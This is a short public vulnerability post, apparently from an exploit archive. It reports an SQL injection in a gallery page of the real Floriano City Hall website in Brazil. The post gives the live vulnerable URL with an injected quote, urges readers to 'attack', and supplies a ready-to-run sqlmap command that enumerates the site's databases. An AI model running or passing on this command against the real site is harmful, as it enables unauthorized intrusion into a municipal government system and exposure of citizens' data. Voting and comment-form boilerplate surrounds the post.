Floriano - PI | SQL Injection

2021.04.11

uromulou (US)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

hello friends, how are you?
I'm here to show you a flaw that I found at the Floriano City Hall, in Piaui, Brazil.

Hacker: uRomulou
Website: https://www.floriano.pi.gov.br/
Vulnerability: SQL Injection Method GET

concept proof

1 . go to the site with the vulnerability >> https://www.floriano.pi.gov.br/galeria.php?id=5%27
2 . will not return errors, as sql failures do not always return errors.
3. and attack! you can use tools like sqlmap or others.

an example using sqlmap : sqlmap --random-agent --batch --url https://www.floriano.pi.gov.br/galeria.php?id=5 --dbs

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Floriano - PI | SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.